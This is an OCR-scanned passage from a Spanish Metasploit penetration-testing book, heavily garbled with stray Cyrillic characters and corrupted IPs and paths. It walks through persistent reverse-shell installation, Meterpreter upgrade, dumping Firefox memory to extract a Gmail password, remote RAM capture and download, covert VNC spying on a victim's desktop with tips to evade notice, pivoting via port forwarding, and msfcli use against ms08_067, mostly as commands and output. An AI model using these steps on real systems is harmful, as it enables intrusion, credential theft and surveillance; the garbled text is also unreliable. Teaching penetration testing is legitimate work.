pass: pero todo se nos fue de Кыке ш [*] Resource file for cleanup created at /root/.msf4/logs/persistence/PRUEBAS-01760CC_20120831 4 
| О 515/РАЧЕВАЅ-01760СС 20129831.4515, гс 
user: y aunque ahora Somos como extrados . кылы корт . [+] Creating Payload=windows/shell/reverse _tcp LHOST=192.168.1,40 LPORT=4444 


pass; yo jamas te olvidare i 57 о. У [+] Persistent agent script is 611030 bytes long ! 
н | аг т 1+] Persistent Script written to C:\WINDOWS\TEMP\WraaGFn. vbs 
user: al.gonz | A [+] Executing script C:\WINDOWS\TEMP\WraaGFn. vbs 
63и . ; A ркы {+} Agent executed with PID 360 
sob fip o з [ж] Installing into autorun as HKLM Software\icrosoftWindows\CurrentVersionRuñYNrgŤÍFhJRPHOQ 
pass: |4567 Шр з des о С 


к | | Installed into autorun as HKLMSoftwareWMicrosoftWWindowsYCurrentVersioniRunyNrgfdFhIRPHopc 
Fig 4.75: Recuperación de un fichero a través del troyano. A СиО ооа ооа. 


Fig 4,76: Autoejecución de un fichero RC provocando infección con persistence. 
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El scrip utilizado dispone del siguiente código: 


run persistence -U -X -P windows/shell/reverse tcp -i 60 -p 4444 
-r 192.168.1.40 


exit 


ta línea de гип finaliza con la dirección IP, todo en lá misma línea, sino no funcionaría. Como se 
puede suponer la imaginación de cada usuario puede ir más allá y conseguir realizar gran cantidad 
de acciones de manera automática. 


Se ha configurado la ejecución de persistence con un payload de tipo no Meterpreter. Ya se ha 
realizado anteriormente una actualización de un payload a un Meterpreter, por lo que simplemente 
se puede dejar una shell y si se requiere mayor funcionalidad, en cualquier momento se' puede 
actualizar a Meterpreter. 

| 

Como se ha mencionado en este libro, en algunas ocasiones es mejor utilizar un payload concreto 
que aporte una funcionalidad sin necesidad de disponer de todo un servidor de funcionalidades. 
Esto depende de lo que se quiera demostrar y de lo que se desee obtener, aunque сото se ve en este 
cjemplo se puede provocar la actualización a un Meterpreter, Es recomendable pensar qué payload 
utilizar en cada momento en función de las necesidades. 


A continuación, se va a comprobar como configurando el módulo exploithmultihandler se puede 
recibir la sesión del agente de persistence que se ha instalado en el equipo. La única diferencia con 
lo que se ha ido configurando en el libro la mayoría de las veces es la utilización de un payload de 
tipo shell. 


mtina a ее LEE a _ — -_ ______lAAA[[TEzZ7]á] 
fast exploit(ms68_067_netapi) > use exploit/multi/handler 


imsf exploit(handler) > set PAYLOAD vindows/shell /reverse_tcp 
PAYLOAD => windows/shell/ reverse tcp 

mst exbloit(handler) > set LHOST 192.168.1,45 

LHOST => 192.168.1.40 ; 

msf exploit(handier) > set LPORT 4444 

LPORT => 4444 

msf exploit(handler) > exploit 


¡l=) Starting the payload handler... 

[+] Sending stage (240 bytes) to 192.168.1.35 

[+] Command shell session 21 opened (192.168.1.40:4444 -> 192.168.1.35:1055] at 2012-08-31 21:57 
:41 +0200 


Microsoft Windows XP [versión 5.1.2699] 


(С) Copyright 1985-2861 Microsoft Corp. 
C: \WWINDOWS\ sy stem32>$ 
а, 


Fig 4.77: Obtención de una shell mediante persistence. 


Por último, se provoca la actualización del payload a un Meterpreter, mediante la subida de un 
Зарег. 


і 

| 

| 

TEF Started reverse handler on 192.168.1.46:4444 | | | 
| 
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picrosoft Windows XP [Versión 5.1.2688] 
lo) Copyright 1985-2001 Microsoft Corp. 


ES 


[+] Command shell session 21 opened (192,168.1.49:4444 


] -> 192,168.1.35;1055) at 2012-08-31 21:57 
:41 +0200 


C: WINDOWS system32>"Z 
Background session 21? [y/N] y 


lre] Started reverse handler оп 192.168.1.40:4444 

[+] Starting the payload handler... 

í*] Command Stager progress - 1.66% done (1699/102108 bytes) 
[€] Command Stager progress ~ 3.33% done (3398/102188 bytes) 
[*] Command Stager progress - 4.99% done (5897/192108 bytes) 
[+] Command Stager progress - 6.66% done (6796/102108 bytes) 
[+] Command Stager progress - 8,32% done (8495/102198 bytes) 


[+] Command Stager progress - 9,98% done (10194/102108 bytes) 
li] Command Stager progress - 11.65% done (11893/102108 bytes) 
Fig 4.78: Actualización de shell a Meterpreter 


PoC: Volcado de memoria remota y análisis 
En esta prueba de concepto se busca lograr la información volátil de la máquina vulnerada, es decir, 


` la información que se perderá cuando la máquina remota se apague. Para obtener información sobre 


la memoria RAM de la máquina vulnerada se dispone en Meterpreter de un script, denominado 


-Process_memeump, capaz de hacer volcados de memoria de procesos. También se podrían utilizar 
herramientas como Win32dd, la cual debería ser subida a la máquina de la victima, para realizar 


volcados o dumpeos de memoria completos. 


En este caso se realizará un volcado de memoria del proceso Firefox y se procederá a la búsqueda de 
credenciales almacenadas u otros datos de interés para el atacante, En el ejemplo se mostrará como 
las credenciales quedan almacenadas en texto plano por el proceso del navegador, aunque el sitio 
web donde fueran introducidas dispusiera de capa de seguridad, que en este caso se corresponde con 
la seguridad de Gmail, | 


E script process_memdump dispone de varios parámetros, de los cuales se detallan a continuación 
los más interesanies: 
- El parámetro -n especifica el nombre del proceso del que se realizará el volcado de 
memoria. 
- ЕІ parámetro -p especifica el PID del proceso del que se quiere realizar el volcado de 
memoria. | 


- El parámetro —г especifica el fichero de texto de donde se recogerán los PID de los 
procesos de los que se quiere realizar el volcado de memoria. Se debe especificar un PID por 
cada línea del fichero de texto, 
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rpreter > run process memdump -h 


EXAMPLE: run process_dump putty.exe 
XAMPLE: run process dump -p 1234 


PYIONS: 


-h Help menti. 
-n <opt> Name of process to dump. Е 
-p <opt> PID о? process to dump. 

-q Query the size of the Process that would be dump in bytes. 

-r <opt> Text file wih list of process names to dump memory for, one per line, 

-t toggle location information in dump. 


ter > run process memdump -p 1348 
*] Dumping memory for firefox.exe 
[+] Dumping Memory of firefox.exe with PID: 1348 


[+] base size = 64 
i>] base size = 128 
[+] base size = 1132 


Fig 4.79: Obtención de la memoria del proceso de Firefox en una ináquina vulnerada, 


Tras ejecutar el script se procede a la descarga а! utomática del volcado de la memoria del proceso. 
Este archivo se almacena en la ruta SH OME?/. msflogs/scripis/p roc_memdump/<fichero DMP>. S 
puede observar que al ejecutar el comando de Linux caí se puede visualizar el contenido del ar ШУ, 
la mayoría es binario, pero se puede observar como existen cadenas de texto legibles. Mediante el 
uso del comando sfrings se va a filtrar todo el contenido no legible, es decir, lodo lo que no sean 
caracteres de texto se despreciará. Por último utilizando el comando grep se filtrará la salida de 
strings para localizar las palabras clave que se quieren obtener. 


Por ejemplo, se va a proceder a realizar la búsqueda de credenciales en el proceso de Firefox del que 
se ha realizado el volcado. Al ejecutar la instrucción cat <fichero DMP> | strings | grep Passwd, 


se obtiene información muy interesante como es la credencial con la que, según la dirección, se ha 
logueado en el webmail de Gmail. 


routGbt:-/.m5sf4/logs/scripts/proc_mendumpé cat 192,168,1.35 firefox.exe_1348 26120908.0319.dmp | 
strings | grep Passwd . 
ошїшһе%ЗАб79%ЗА1ёсһескеййошаїп5=уоиїиһе&11ше51їр=&есТоК=&Еша11=раһ1о®4В8Т1и&Раз$ый=123аһс.&5101 
=Iniciar+sesi%C3%B3n4armshown=1 
el "Passud"); 
var passwd elem = el("Passwd”); 
} else if (f.Possud) { 
f .Passwd.focus(); 
ү else if (f.Passwd} 4 
f.Passwd.focus(); 
id="Passwd" 
continue=http$3A%2F%2Fmail google. comk*2Fmail$2Fáservice=mailárm=falseádsh=386604490811879281381t 
netscape aa нур O ceca 


ains=youtubestimeStmp=AsecTok=4Email=pablox46fiu8Passwd=123abc.6signin=Iniciar+sesisC3%B3nSrmSho 


Fig 4.80: Oblención de credenciales del proceso de Firefox. 


Por último se presenta la posibilidad de realizar un volcado completo de la memoria RAM y un 
análisis de ésta mediante el framework de Volatility, el cual puede ser descargado desde la URL 
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htips:/www.volatilesystems.comidefault/volatility. Para realizar el volcado de la memoria RAM se 
pueden utilizar una serie de aplicaciones, como МОР o Win32ad. 


En primer lugar, se sube а la máquina vulnerada la herramienta Win32ckd, por ejemplo en la rula 
сг\. Para realizar el volcado de la memoria RAM de la máquina vulnerada se ejecuta la instrueción 
win32dd.exe lr {f <fichero> /a. El parámetro /r indica que será un volcado de tipo кет, /Pel fichero 
donde se almacenará y /a que se aceptarán todas las preguntas que realice la aplicación. 


Cowin3zdd.exe уг /ї cixwolcado.bin /a i R A 
vin32dd.2xe /r /f ciWwolcado.bin fa | 
wín32dd - 1.3.1,20100417 - (Community Edition) - | 
| kernel land physical memory acquisition і 
Copyright 1С) 2097 - 2019, Matthieu Suiche <http://wew.msuiche.net> | 
Copyright (£) 2609 - 2018, Hoonsols <һћїіїр: //мин. moonsots. com> | 
Name Value і 
File type: Raw memory dump file 
Acquisition method: PFN Mapping 
Content: Memory manager physical memory block 
Destination path: c:Wvolcado.bin | 
0.5. Version: Microsoft Windows XP Professional Service Pack 3 (build 2609) 
Cemputer name: PRUEBAS -01769CC 
| { 
Physical memory in use: В1% 
Physical memory size: 196088 Kb ( 191 Mb) 


Physical memory available: 36176 Kb ( 35 Mb) 


967776 Kb ( 


Fig 4.81: Realización бе! volcado de la memoria RAM de manera remota. 


Paging file size: 945 Mb) 


Una vez que se realiza el volcado de la RAM, se debe descargar la imagen manualmente, a través 
de la ejecución del comando download de Meterpreter, "МА proceso puede llevar bastante tiempo, 

ya que dependerá del tamaño de la memoria RAM de la máquina vulnerada. En este ejemplo, la 
memoria RAM del equipo remoto es de 192 MB. 


meterpreter > download c:Yiwolcado.bin /root 
[+] downloading: c:\volcado.bin -> /root/volcada.bin 
£*] downloaded : c:Yvolcado.bin -> /root/volcado.bin 


meterpreter > 


Fig 4.82 Descarga del volcado completo de la memoria RAM de la máquina vuincrada. 


En este momento hay que utilizar el framework de Volatility para sacar la máxima información de le la 
máquina vulnerada. Este framework permite realizar gran cantidad de opciones sobre imágenes de 
volcado de memoria RAM, sería necesario dedicar tiempo a su estudio y aprovechamiento. Pero el 
objetivo de la prueba de concepto es ilustrar algunas de las posibilidades que Volatility proporciona. 


Para ejecutar la ayuda de Volatility se debe ejecutar python vol.py —h, dicho archivo estará situado 
en el directorio donde se encuentren los archivos Python del framework Volatility. Si se quieren 


| 


consultar las conexiones activas en el momento de realizar el volcado de la memoria RAM ве debe 
ejecutar la siguiente instrucción python vol.py connections -f <fichero BIN>. 


root@ht:~/volatility-2. 1# python vol.py connections -f /root/volcado bir, 
Volatile Systems Volatility Framework 2.1 


Offset(V) Local Address Remote Address Pid 
OxBOd5b8e0 127.0.0.1:1046 127.0,0.1:1945 432 
®х8006!се@ 127.0.0,1:1045 127.0.0.1:1046 { 432 
9x80e23418 127.0.0.1:1048 127.6,9,1:1047 432 
0x80e57468 127.8.0.1:1847 127.8.8.1:1048 432 | 
0x80e62068 192.168.1.35:1154 74.125.230.203:89 432 ! 
ӨхВбебс1ге 192.168.1.35:1158 74.125.236.203:88 437 
0х50660888 192,168.1.35:1142 74.125.230.203:80 437 
0x802769e8 192.168.1.35:1114 74.125.239.203:88 432 
0x80e77598 192,168,1.35:1116 74.125.230.203:80 432 | 
0xB8e709e8 192.168.1,35:1134 173.154.66.121:80 457 
0х8бесЬ1ї8 192,168.1.35:1078 173.}94.67,191:@0 432 | 
DAS 00432 { 


Fig 4.83, Recuperación de conexiones activas del fichero del volcado de la RAM remota, 


жа ia К 1; 3 * X д + » р 
Para visualizar los archivos abiertos por los procesos que se encontraban en ejecución en el momento 
Ja volcado de la memoria RAM remota se debe ejecutar 1а instrucción python vol. py files -f <fichero 
BIN>. Otra instrucción interesante es la recuperación del listado de procesos en ejecución en ese 
momento python vol py pslis -f <fichero BIN>. 


OIR A O O COD 
¡roclébt:-/volatility-2.1% python vol.py pslist -f ¿root/volcado.bin | 
Volatile Systems Volatility Framework 2.1 

золу а а Д a 

о Name PID PPID  Thds Hnós Sess MWowb6d Start | 
0х80716020 System s 4 е 54. 445 --.--- а | 
|газ 55$. ехе 424 4 3 19 ------ 0 2012-03-07 23:32:07 

1] 

ЖЫ csrss exe i 844 424 11 455 9 Ə 2012-99-97 23:32:07 


¡0x80d63c08 winlogon.exe 668 424 19 478 8 8 2017-A3-A7 23:32:07 | 
Pig 4,84: Recuperación del listado de procesos del fichero del volcado de la RAM remota, 


Las posibilidades que ofrece Volatility para el análisis forense son ilimitadas, por lo oue se recomienda 


su estudio y la realización de pruebas para comprender y entender todo lo que este framework es 
capaz de proporcionar al usuario. А. 


э. o 

PoC: VNC Payload 

in esta prueba de concepto se presenta la utilización de un payload ım tanto peculiar. Con este 
payload se podrá visualizar el escritorio remoto de la victima. Hay varias maneras de utilizar VNC 


en Metasploit, el objetivo es poder visualizar el escritorio de la víctima, sin que ella detecte tal 
circunstancia. 


El primer caso que se estudiará es el del payload vncinject. El payload cargado debe ser windows/ 
vncinject/reverse_1cp, conexión inversa por ejemplo, Este payload inyecta un servidor VNC en la 
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memoria de la máquina vulnerada, el exploit conecta automáticamente con éste y se obtiene la visión 
del escritorio de la victima. | 


msf ехр\0іт(т508 067 netapi) > exploit 


[+1 Started reverse handler оп 192. 168.1.40:4444 
[=] Automatically detecting the target... 
i+] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish 
[+] Selected Target: Windows XP SP3 Spanish (NX) 
[+] Attempting to trigyer the vulnerability... 
[+] Sénding stage (445448 bytes) to 192.168.1.35 
[*) Starting local TCP relay on 127.0.9,1:5988... 
[+] Local TCP relay started. 
[*] Launched vncviever. 
(+] Session 1 created in the background. 
msf exploitímsd8_067 пеїарі) > Connected to RFB server, using protocol version 3.8 
Enabling TightVNC protocol extensions 
No authentication needed 
huthentication successful 
Desktop name “ргиеђаѕ -01760сс" 
ММС server default format: 
| 32 bits per pixel. 
Least significant byte first in each pixel. 
Al colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 8 
larnihg: Cannot convert string ”-*-helvetica-bold-r-*-+-16-*-+-*-*-*.*-*" to type FontStruct 
Using default colormap which is Truetolor. Pixel format: 
32 bits per pixel. 
Least significant byte first in each pixel. 
True colour: max гей 255 green 255 blue 255, shift red 16 green 8 blue 9 
Same machine: preferring raw encoding 


Pig 4.85: Explotación con inyección de windows/Wcinject/reverse_tcp. 

А y 

Нау que tener cuidado con éste payload ya que realiza la apertura de una cmd en la máquina 
vulnerada. Esta situación es extraña para el usuario víctima, el cual se puede alertar de la presencia 
del atacante al visualizar dicho evento, 


heterpreter > run vne 

[+] Creating a VNE reverse tcp stager: LHOST=192.168,1.40 LPORT=4545) 

[+] Running payload handler 

H4] VNC stager executable 73802 bytes lung 

{®] Uploaded the УМС agent to C:\WINDOWS\TEMP\TNpWaQZiiVTcz.exe (must be deleted manual ty} 
{*] Executing the VNC agent with endpoint 192.168,1.40:4545,.. 

meterpreter > Connected to RFB server, using protocol version 3.8 

Enabling TightVNC protocol extensions 

No authentication needed 

Authentication successful ` 

Desktop name "pruebas-01768cc" 

МАС server default format: 

32 bits per pixel. 

Least significant byte first in each pixel. 

True colour: тах red 255 green 255 blue 255, shift red 16 green 8 blue 8 


Fig 4.86: Obtención de la visión de un escritorio remoto con VNC en la sesión de la víctima, 


Otra opción posible es la utilización del script de Meterpreter упс. Con éste script se ejecuta un 
agente con el que se puede realizar la conexión, y obtener la visión del escrito! іо де la víctima. Hay 
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que tener cuidado con la posibilidad de no mover el ratón al usuario, ya que podría darse cuenta, 
Se recomienda, simplemente visualizar las acciones de éste, a la vez, que por ejempio, se utiliza un 
keylogger para capturar credenciales no visibles. 


PoC: Port forwarding 


En esta prueba de concepto se presenta el concepto de port forwarding сой el que un alacante podrá 


utilizar una máquina vulnerada como cebo o- máquina que realizará las peliciones por él. En otras 


palabras, se propone el siguiente escenario: 
- Ш atacante utiliza un sistema operativo con Metasploit, por ejemplo BackTrack 5. 
~ іа máquina vulnerada con un sislema operativo, por ejemplo, Windows AP. 


- La máquina objetivo. En esta máquina se quiere oblener acceso o realizar un ataque. Esla 
máquina recibirá las peticiones como si viniesen ue la máquina vulnerada, en vez de provenir 
del аіасапіе. 


Para realizar esta lécnica se utiliza el comando portfwd, el cual dispone de varios parámetros 


interesantes: 


- Е! parámetro —L indica el host local donde comenzará la redirección de paquetes. Este 
parámetro es opcional, por defecto se configura con la dirección ІР de la máquina vulnerada. 


- Е parámetro —r indica el host remoto al que se reenviarán los paquetes, es la dirección ІР 
de la máquina objetivo. 


- Ef parámetro —] indica el puerto local dónde se recibirán las conexiones. Este puerlo 
pertenece a la máquina vulnerada. 


- ВІ parámetro —p indica el puerto de la máquina remota, es decir la especificada еп el 
parámetro —t, a la que se realizarán los reenvíos. 


A continuación se presenta un sencillo ejemplo donde las peticiones que el atacante quiere realizar а 
una máquina objetivo, se realizan a través de una máquina vulnerada. La máquina objetivo recibirá 
las peticiones como si realmente fueran originadas por la máquina vulnerada. 


El escenario arranca con una sesión de Meterpreter del atacante sobre la máquina vulnerada. La 
configuración del comando porifwd es sencilla tal y como se puede visualizar en la imagen de la 
página siguiente. 


Tras la ejecución del comando, la máquina atacante enviará el tráfico a su interfaz local donde tiene 
un fistener en un puerto concreto encargado de redirigir el tráfico a Melerpreter en la máquina 
vulnerada. Esta máquina vulnerada recibe la petición y la reenvía hacia la máquina objetivo. La 
configuración del comando es sencilla y para poder visualizar las órdenes creadas en porifwd se 
puede ejecutar sólo el comando para obtener el listado. 
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-L <opt> Тһе local host to listen on (optional). 
-h Help banner. 

-L «орї» The local port to listen оп. 

-p <opt> The remote port to connect to. * 

-r <opt> The remote host to connect to. 


. heterpreter:> portfwd add -1 9098 -p 89 -r 192.168,0.63 
de Local ТСР relay created: 0.0.0.8:9080 <-> 192,168.0.63:88 
teterareter > dackground 
[+] gacsgroundirg session 1... 
así exploit(mse8_657_netapi) > ifconfig | grep inet 
|" exec: ifconfig | grep inet 


inet addr:192,168.6.61 


Le 


Bcast;192.168,0,255 Mask:255.255.259. 
Fig 4.87: Redirección de paquetes a través del comando porfi ed. 


Ahora, el atacante abre el navegador web y escribe la dirección Attp:⁄/127.0.0.1:9000, ¿Por qué el 
puerto 9000? Es donde se ha configurado el fistener en la configuración de porífiwd. La respuesta 
que se obtiene es “11 Works”, que es el fichero por defècto de un servidor Apache. 


al el 


атту" e m 


Е; б, ий Musie. 


з works! 


This is the default web page for this server. 


“The web server software is running but no content has been added, уві. 


Fig 4.88: Petición http a través de una máquina vulnerada. 


¿Realmente es la máquina vulnerada quién realiza la petición encubriendo a la máquina del atacante? 
La respuesta es sí, en la máquina del objetivo se abre la aplicación Wireshark para visualizar el 
tráfico que Пера por su interfaz de red. Las máquinas del escenario tienen las siguientes direcciones 
[Р: 


- |а máquina del atacante tiene la dirección IP 192.168.0.61. 
- а máquina vulnerada tiene la dirección 1P 192.168.0.62. 


- [а máquina objetivo tiene la dirección 1P 192.168.0.63. 


En la imagen siguiente se puede visualizar como la petición HTTP llega a través de la máquina con 
dirección IP 192.168.0.62, que es la vulnerada. Esta técnica puede dar lugar a otro gran número de 
posibilidades, 
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| 
| З AL l | 
H Host: 127.0.0.1; JOGO PAN 

| User agent: Mozilla/5,0 (XIL; Linux 1686 оп x86 64; гу:2.0.1) Gecko/26100101 Firefox/4 
| Accept: text/html, application/xhtml+xml, application/xml; 1®0.8,#*/*;д=0.8\\й 
аери  ___ Q Q __ EEE асана 


ig 4.89: Captura de Wireshark donde se visualiza. el origen de la petición. 


Hay que tener en cuenta, como se puede visualizar en la imagen, que el User-Agent puede delatar a 
la máquina origen, por lo que puede ser interesante cambiar dicha información. 
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Capítulo У 
Otras msf tools 


1. msf tooís 


En multitud de ocasiones se ha comentado que Metasploit es un framework o conjunto de 
herramientas que proporcionan distintas funcionalidades al auditor. En este capítulo se pueden 
estudiar y realizar pruebas con las más utilizadas o reconocidas a nivel mundial en el ámbito de la 
intrusión o pentesting. Como curiosidad indicar que todas las herramientas comienzan рог las siglas 
msf( Metasploit framework) seguidas de un nombre indicativo de la acción que realizan. 


A menudo muchos de los pentesters o auditores de seguridad se pueden encontrar con cambios en las 
herramientas disponibles en el framework de Metasploit. Este hecho es debido a que se desarrollan 
nuevas versiones O nuevas aplicaciones que pasan a formar parte del framework. Es sencillo 
encontrarse que en nuevas versiones de Metasploit aparezcan nuevas aplicaciones que proporcionan 
rovedosas funcionalidades o, incluso, optimizan funciones existentes de varias herramientas, como 
por ejemplo msfvenom, ia cual fusiona la funcionalidad de ms/payload y de msfencode. | 


Rn anteriores capítulos se han estudiado herramientas que proporcionan y facilitan el uso del 


framework, ya sea mediante el uso de una línea de comandos, msfconsole, o mediante el uso de 


una interfaz gráfica, por ejemplo armitage. Pero, como se ha mencionado, existen otro tipo de 
herramientas con otras funcionalidades, cemo por ejemplo la creación de ejecutables que alberguen , 
en su interior código ejecutable o shellcode con fines maliciosos. Por otro lado, también se puede 
ayudar a los exploiters a obtener payloads sin necesidad de crearlos ellos mismos. 


Oiro tipo de aplicaciones muy utilizado son las que ayudan a evadir los sistemas de defensa de 
una máquina, como por ejemplo los antivirus. La mayoria de los payloads que son utilizados por 
Metasploit pueden ser detectados por una gran parte de los antivirus, por ello es necesario utilizar 
herramientas que ofusquen el código del payloud para evitar su detección. 


Existen herramientas en el framework cuya finalidad es la manipulación de la memoria y análisis de 
ésta, Este tipo de herramientas ayudan al exploiter a encontrar instrucciones en lenguaje ensamblador 
clave para el desarrollo del exploit. 


La gestión remota también se encuentra disponible en Metasploit gracias a herramientas como msfd, 
la cual proporciona un servicio о daemon cor el que se puede manipular el framework remotamente. 
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Por último mencionar que Metasploit sigue creciendo y aumentando en funcionalidades e integración 
con otros sistemas y aplicaciones de seguridad. Este hecho hace que el framework disponga de una 
riqueza implícita realmente interesante para su utilización en el día a día del auditor. Las msf tools 
siguen apareciendo y añadiéndose al framework lo que proporciona un hecho muy interesante como 
$e mencionó anteriormente. 


rootarcot:/pentest/exploits/franework28 ls 

armitage HACKING msfconsole msfgui msfpescan plugins tests | 
lata Lib msfd msfmachscan msfrpc ,  README 
documentation modules msfelfscan msfopcode msfrpcd scripts 
эхтегпа1 msfcli  msfencode  msfpayload  msfupdate test 
rootéroot:/pentest/expleits/Tramework34 


Fig 5.01: Msf tools disponibles en BackTrack 5. 


са 


2. Mstcli: El poder de la línea 


Esta herramienta es una de las cuatro opciones que dispone la arquitectura de Metasploit para 
interactuar con el framework. Es decir, es una de las cuatro interfaces que existen para ejecutar 
instrucciones y realizar distintas fases de un test de intrusión. 


Esta aplicación permite ejecutar módulos de tipo exploit o auxiliary directamente desde una línea de 
comandos. De este modo, se evila tener que cargar todas las estructuras necesarias cuando se ejecula 
la aplicación msfconsole. Se puede entender como que cuando se arranca msfconsole se cargan en 
memoria las estructuras necesarias para el correcto funcionamiento de Metasploit, mientras que 
arrancando msfcli se carga solamente un módulo por lo que se ejecutará la acción de manera más 
rápida. | 


Нау que tener en cuenta que en el momento de lanzar un módulo con msfeli se deben indicar todas 
las opciones necesarias para la correcta ejecución del módulo, Por ejemplo, si se va a proceder a 
lanzar un exploit con esta herramienta se deberá indicar, generalmente, ei equipo remoto sobre el 
que se lanzará dicho exploit о la dirección 1P sobre la que se implementa el servidor para los ataques 
de tipo Client-Side Attack. Se debe indicar qué tipo de payloads se utilizan si es un módulo de tipo 
exploit, 


La sintaxis de la herramienta es ms/cli <ruta módulo> [PAYLOAD=<ruta payload> LHOST/RHOST 
LPORT/RPORT] <modo>. Los distintos modos proporcionan gran flexibilidad a la herramienta ya 
. que indican qué acción se realizará. 


Нау que tener en cuenta que cuando se utiliza la herramienta msfcli todos los parámetros son 
asignados mediante el uso del operador “=”. En ms/console se indica el parámetro у a continuación 
se asigna el valor, Además, msfcli es case sensitive, detalle que hay que tener en cuenta рага el 
correcto funcionamiento de la aplicación. 
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Modos де msfeli 

Los modos de ejecución de msfeli indican qué acción realizará la aplicación. En la imagen se observan 
los distintos modos de ejecución que dispone la herramienta. Hay que considerar que las opciones 
son equivalentes a los parámetros o variables, como por ejemplo: RHOST, LHOST, etcétera. 


A е 
} — 

RDA NATA A AA | 
Mode ` Description І | 
(H)elp You're looking at it baby! . 

(S)unmary Show information about this module. 
(dptions Show available options for this module | 
(A)dvanced Show available advanced options for this module 
(1)0s Evasion Show available ids evasion options for this module | 
| (P)ayloads Show available payloads for this module | 
{Т)агце1в Show available targets for this exploit module | 
 (AC)tions Show available actions for this auxiliary module | 
Т (Cjheck - Run the check routine of the selected module 


_ 


¡E)xecute Execute the selected module 


Fig 5.02: Modos de ejecución de ms/cli. 


El primero de los modos que se presenta es uno de los más importantes y es el modo H. Este modo 
proporciona ayuda e información sobre la aplicación. Si se ejecuta la siguiente instrucción ms/cli 
<exploit> H, se obtiene ayuda sobre la aplicación туей. 


rootároot:/pentest/exploits/Trawevork3s msfeli И Ие 5 
{*] Please wait while ме load the module tree. | 


і 
| 
Н 
Name: Generic Payload Handler É | 
Module: exploit/multizhandter 
Version: 11845 
Platform: Windows, Linux, Solaris, Unix, 0SX, BSD, PHP, Java 
Privileged: No 
License: Metasploit Framework License (BSD) 
Rank: Manual 
| 
| 
| 


rovided by: 
hdm <hdmenetasploit. com> 


vailable targets: 
Id Name 


о wildcard Target 


ayload information: 
Space: 18000989 
Avoid: 0 characters 


escription: 
This modute is a stub that provides а of the features of the 
Metasploit payload system to exploits that have been launched 
outside of the framework. 


Fig 5.03: Ejecución msfcli en modo summary. 
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Existe el modo resumen o summary, que es indicado mediante la letra S, el cual proporciona 
información sobre un módulo en concreto que se requiera utilizar. La sintaxis es realmente sencilla, 
un ejemplo se puede visualizar en la imagen anterior, 


El modo О u opciones muestra información sobre las variables que se pueden configurar sobre un 
módulo concreto. En el ejemplo se ha utilizado el módulo exploit/windows/smb/psexec y se obtienen 
las distintas variables que pueden ser configuradas. Este modo es el equivalente a show options en 
una sesión de ms/console. 


rooigruot: /pentost/sxplolts/framework34 msfcli exploit/windows/smb/psexec € 
11] Please wait while we load the module tree... 


Name Current Setting Required Pescription 
RHOST yss The target address 
RPORT 445 yes Set the SMB service port 
SHARE ADMINS yes The share to connect to, can be an admin share 
CADMINS,C0$,...) or а normal read/write folder share 
SMBDomain WORKGROUP no The Windows domain to use for authentication 
SiBPass no The password for the specified username 
| SMBuser , no The username to authenticate as | 


Fig 5.04: Ejecución msfeli еп modo options. 


Los modos A e l son especiales, el primero muestra información sobre las variables avanzadas que 
pueden ser configuradas en un módulo concreto. El segundo es un modo muy interesante, ya que 
proporciona información sobre opciones para la evasión de IDS en caso de que el módulo con el que 
se esté trabajando disponga de esta opción. 


El modo Р proporciona información sobre los payloads disponibles рага un módulo de exploi 
o auxiliary en concreto. Esta opción es realmente útil y proporciona información muy válida y 
recomendada de visualizár antes de lanzar el módulo. Este modo es equivalente a la instrucción 
show payloads cuando se encuentra un módulo concreto cargado en una sesión de msfconsole. 


Т ; 7 - рева 
[гмёггөї:/ремтев /вхр\ой та таленөгїзу msfcli exploit/windows/smb/psexec Р 


1*] Please wait while we load the module tree... 


Paine payloads 


generic/shell_bind tcp 
ell 
¡ generic/shell_reverse_tcp 
shell 


| generic/debug trap 


generic/tight_loop 
windows/adduser 
istration group 
windows/dWinject/bind_ipv6_tcp 
{1 via a reflective loader 
windows /dllinject/bind_nonx_tcp 
via a reflective loader 
windows /dilinject/bind_tcp 
fective loader 


і 


Description 


| 
| 
AAA i * 


Generate a debug trap in the target process 
Listen for a connection and spawn а command 5 


Connect back to attecker and spawn a command 


Generate a tight loop in the target process 
Create a new user and add them to local admin 


Listen for a connection over 1Pv6, Inject a D 
Listen for a connection (No NX), Хлјесї а 011 


Listen for a connection, Inject a 011 via a г 


Fig 5.05: Ejecución msfeli en modo payloads. 
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El modo targets о T proporciona información sobre los sistemas operativos vulnerables antes de 
ejecutar un explojt concreto, En la imagen se pueden visualizar un gran número de targefs рата еј 
exploit ms08_067_netapi, el cual ha sido estudiado en el presente libro, Realmente el número de 
targets para los que está disponible este exploit son 62 versiones distintas de Windows, con distintos 
idiomas, en versiones XP, 2003, 2000, etcétera. Este modo es equivalente a la instrucción shoy, 
targets cuando se encuentra un módulo cargado en msfconsole. | 


rootfiroat: /пеп{ев+/вхр1о115/ Ѓгапеногка? msfcli exploit/windows/smb/ms8B_067 _netapi Т 
[*] Please wait while we load the module tree... | 


Id Мате 


Automatic Targeting 
Windows 2008 Universal 
Windows XP SPO/SP1 Universal 
Windows XP 5Р2 English (NX) 
“Windows XP SP3 English (NX) 
Windows 2003 SP8 Universal 
Wingows 2003 5Р1 English (NO НХ) 
Windows 2803 5Р1 English (МХ) 
Windows 2083 SP1 Japanese (NO MX) 
Windows 2283 SP2 English {N9 NX) 
Windows 2603 SP2 English (NX) 
Windows 2093 SP? German (NO NX} 
Windows 2003 5Р2 German. (MX) 
Windows XP 5р2 Arabic (NX) 
{ Windows XP SP2 Chinese - Traditional / Taiwan (NX) 
Windows XP SP2 chinese - Simplified (NX) 
Windows XP SP2 Chinese - Yraditional (NX) 
Windows ХР 5Р2 Czech (HX) 
Windows XP SP2 Danish (HX) 
| Windows ХР 5Р2 German {NX} 


20 Windows XP 5Р2 Greek (NX) | 
Windows ХР 5Р2 Spanish (NX) 
12 Windows XP 5Р2 Finnish (NX) 


Fig 5.06: Ejecución msfeli en modo targets. 
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El modo АС o actions proporciona información sobre acciones que pueden realizar los módulos qe 
tipo auxiliary. Por otro lado se encuentra el modo С o check que equivale a la instrucción check en 
una sesión de msfeonsole. En la imagen se puede visualizar como configurando la variable RHOST, 
indicando el modo C y especificando el exploit se comprueba si el objetivo es vulnerable o no. 


rootaroat;-2 msfcti exploit/windows/smb/ms08_067 _netapi RHOST=192.168.1.38 С 
[*] Please wait while we load the module tree... 

[+] Verifying vulnerable status... (path: 0x0090005a) 

[+] The target is vulnerable. 


rootarost:-4 


Fig 5.07: Ejecución msfcli en modo check. 


El modo E o ejecución, es quizá el modo más conocido por los auditores. Con dicho modo se lanza 
el módulo, ya sea auxiliary o exploit. Es necesario, indicar las variables requeridas en el momento 
